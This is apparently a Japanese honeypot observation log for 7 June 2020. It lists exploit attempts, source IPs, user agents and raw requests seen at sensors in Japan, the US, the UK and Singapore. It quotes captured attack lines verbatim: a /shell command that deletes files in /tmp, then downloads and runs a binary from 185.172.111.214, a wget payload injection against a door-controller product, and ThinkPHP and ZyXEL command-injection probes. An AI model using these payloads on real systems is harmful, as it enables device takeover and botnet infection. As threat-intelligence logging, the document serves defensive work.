2020/06/07 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/06/07分です。

特徴

Location：JP

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.172.111.214/bins/UnHAnaAW.x86;
chmod 777 /tmp/UnHAnaAW.x86;
sh /tmp/UnHAnaAW.x86

Location：US

Axis製品の脆弱性を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTCによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.172.111.214/bins/UnHAnaAW.x86;
chmod 777 /tmp/UnHAnaAW.x86;
sh /tmp/UnHAnaAW.x86 w00dy.jaws

Location：UK

DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。

Location：SG

DrayTek製品の脆弱性を狙うアクセス
Linear eMerge E3製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
123[.]126[.]104[.]68に関する不正通信
を確認しました。

他

アクセス数推移

JP：総アクセス数：79 (前日比：-84)
US：総アクセス数：30 (前日比：-88)
UK：総アクセス数：19 (前日比：-18)
SG：総アクセス数：48 (前日比：+31)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.9.175.41	Malaysia
1	18.176.56.123	United States
34	44.225.84.206	United States
2	45.141.84.40	Russia
1	47.206.38.79	United States
4	80.82.77.33	Netherlands
28	89.135.141.89	Hungary
1	109.184.64.24	Russia
1	113.14.202.161	China
1	142.111.201.122	United States
1	162.243.141.121	United States
1	162.243.142.155	United States
1	177.207.81.134	Brazil
1	190.128.226.34	Paraguay
1	200.52.44.207	Mexico

UserAgent一覧

件数	UserAgent
26	-
14	AWS Security Scanner
1	Go-http-client/1.1
1	Hello, World
1	Hello, world
2	Mozilla/5.0
28	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
2	Mozilla/5.0 zgrab/0.x
1	XTC
1	curl/7.29.0
1	polaris botnet
1	python-requests/2.23.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
2		\x03
10		\x16\x03\x01
10	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
4	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1	HTTP/1.1
1	GET	/shell?busybox	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/t	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	24.138.226.129	Puerto Rico
1	37.49.226.24	Netherlands
1	41.78.172.77	Nigeria
2	45.141.84.40	Russia
10	116.199.2.34	China
1	190.96.67.243	Chile
10	195.54.160.135	Russia
2	198.178.8.34	United States
1	200.46.45.114	Panama
1	201.21.226.33	Brazil

UserAgent一覧

件数	UserAgent
3	-
2	AccServer[NCO-AVIGILON02]/6.2.2.6(40263) 64-bit HTTP-Agent
1	Go-http-client/1.1
1	Hello, world
2	Mozilla/5.0
1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
10	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
1		\x16\x03\x01\x02
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
2	GET	/axis-cgi/admin/param.cgi?action=list&group=Properties	HTTP/1.0
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/shell?busybox	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	45.141.84.40	Russia
1	83.110.9.93	United Arab Emirates
1	95.9.202.235	Turkey
1	104.199.191.188	United States
1	162.243.141.12	United States
1	162.243.143.49	United States
12	195.54.160.135	Russia

UserAgent一覧

件数	UserAgent
2	-
1	Go-http-client/1.1
1	Mozilla/5.0
12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 zgrab/0.x
1	XTC BOTNET

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
1	GET	/hudson	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/t	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	14.241.249.199	Vietnam
1	61.219.11.153	Taiwan
1	91.203.61.191	Ukraine
10	122.51.29.221	China
7	148.70.99.99	China
1	162.243.138.141	United States
1	185.202.2.149	Netherlands
1	185.244.39.112	Netherlands
1	191.180.225.24	Brazil
19	195.54.160.135	Russia
2	208.91.109.50	United States
1	217.58.61.49	Italy
2	222.129.37.226	China

UserAgent一覧

件数	UserAgent
6	-
1	Go-http-client/1.1
1	Mozilla/5.0
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
19	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
16	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
1	Mozilla/5.0 zgrab/0.x
2	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1		\x03
1	CONNECT	123[.]126[.]104[.]68:80	HTTP/1.1
3	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
3	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
1	GET	/card_scan_decoder.php?No=30&door=%60wget http[:]//switchnets[.]net/hoho.arm7;
2	GET	/elrekt.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
2	GET	/index.php	HTTP/1.1
3	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
3	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	http[:]//js[.]sogou[.]com/pv_sogou.js	HTTP/1.1
2	HEAD	/robots.txt	HTTP/1.0
3	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1